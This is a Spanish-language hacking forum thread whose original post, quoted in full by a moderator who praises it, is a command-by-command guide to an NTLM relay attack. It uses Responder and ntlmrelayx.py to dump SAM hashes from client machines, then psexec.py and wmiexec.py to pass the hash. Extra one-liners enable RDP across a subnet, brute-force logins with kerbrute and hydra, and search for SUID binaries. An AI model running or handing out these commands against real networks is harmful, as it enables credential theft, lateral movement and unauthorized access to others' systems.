NTLMRelay


mathuerso

Miembro muy activo
Noder
NTLM Relay

Más o menos como el SMB Relay pero ha diferencia de:
En el archivo responder.conf hemos de poner a OFF HTTP y SMB ya que estos servicios
los simularan el archivo ntlmrelayx.py.
En una primera ventana, correremos el comando:

respondr -I eth0 -dw


En una segunda el comando:

python3 "ruta donde esté ntlmrelayx.py" -tf target.txt -smb2support


*La ruta de ntlmrelayx.py la encontramos haciendo un locate ntlmrelayx.py
*Y target.txt sera un archivo donde hayamos añadido las IP de las maquinas clientes, de
las que queremos dumpear la SAM. Ya sea haciendo un crackmapexec smb IP/24 para
ver las IP que sean clientes.
Cuado dumpeemos la SAM, esos hashes son NTLMv1 por lo que no hace falta
crackearlos, ya podemos usarlos directamente con el comando:​

python3 "ruta donde esté psexec.py" Usuario:passWord@IP (puedes poner al final cmd.exe)

nombre.dominio no se pondría en este comando ya que es la SAM

Tambien podemos hacer pass the hash con wmiexec.py:

python3 "ruta donde este wmiexec.py" nombre.dominio/Usuario@IP -hashes 1uydtXXXX8d:123XXXX712g


*Comodin

crackmapexec smb IP/24 -u User -p Password -M rdp -o action=enable

Esto para habilitar el rdp en los equipos con los que tengas privilegios con ese usuario y
esa contraseña y poder acceder a ellos.

*Comodin

nmap -p(puerto http) --script=http-enum -sV IP

*Comodin

crackmapexec protocolo IP -u file_users -p file_passwords

*Comodin

kerbrute -users users.txt -passwords pass.txt -domain dominio -threads 100

*Comodin

hydra -l user -P /usr/shares/wordlists/rockyou.txt ftp://IP -t 64

*Comodin

find / -perm -u=s -type f 2>/dev/null


LOS COMODINES SON COMANOS PARA QUE LOS INVESTIGUEIS POR VUESTRA CUENTA​
 
  • Regalar
  • Like
Reacciones : sedyo, Dark and Anon

Dark

🔥root313🔥
Staff
Moderador
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Noderador
Nodero
Noder Pro
Noder
NTLM Relay

Más o menos como el SMB Relay pero ha diferencia de:
En el archivo responder.conf hemos de poner a OFF HTTP y SMB ya que estos servicios
los simularan el archivo ntlmrelayx.py.
En una primera ventana, correremos el comando:

respondr -I eth0 -dw


En una segunda el comando:

python3 "ruta donde esté ntlmrelayx.py" -tf target.txt -smb2support


*La ruta de ntlmrelayx.py la encontramos haciendo un locate ntlmrelayx.py
*Y target.txt sera un archivo donde hayamos añadido las IP de las maquinas clientes, de
las que queremos dumpear la SAM. Ya sea haciendo un crackmapexec smb IP/24 para
ver las IP que sean clientes.
Cuado dumpeemos la SAM, esos hashes son NTLMv1 por lo que no hace falta
crackearlos, ya podemos usarlos directamente con el comando:​

python3 "ruta donde esté psexec.py" Usuario:passWord@IP (puedes poner al final cmd.exe)

nombre.dominio no se pondría en este comando ya que es la SAM

Tambien podemos hacer pass the hash con wmiexec.py:

python3 "ruta donde este wmiexec.py" nombre.dominio/Usuario@IP -hashes 1uydtXXXX8d:123XXXX712g


*Comodin

crackmapexec smb IP/24 -u User -p Password -M rdp -o action=enable

Esto para habilitar el rdp en los equipos con los que tengas privilegios con ese usuario y
esa contraseña y poder acceder a ellos.

*Comodin

nmap -p(puerto http) --script=http-enum -sV IP

*Comodin

crackmapexec protocolo IP -u file_users -p file_passwords

*Comodin

kerbrute -users users.txt -passwords pass.txt -domain dominio -threads 100

*Comodin

hydra -l user -P /usr/shares/wordlists/rockyou.txt ftp://IP -t 64

*Comodin

find / -perm -u=s -type f 2>/dev/null


LOS COMODINES SON COMANOS PARA QUE LOS INVESTIGUEIS POR VUESTRA CUENTA​
Buen aporte.
 
  • Like
Reacciones : mathuerso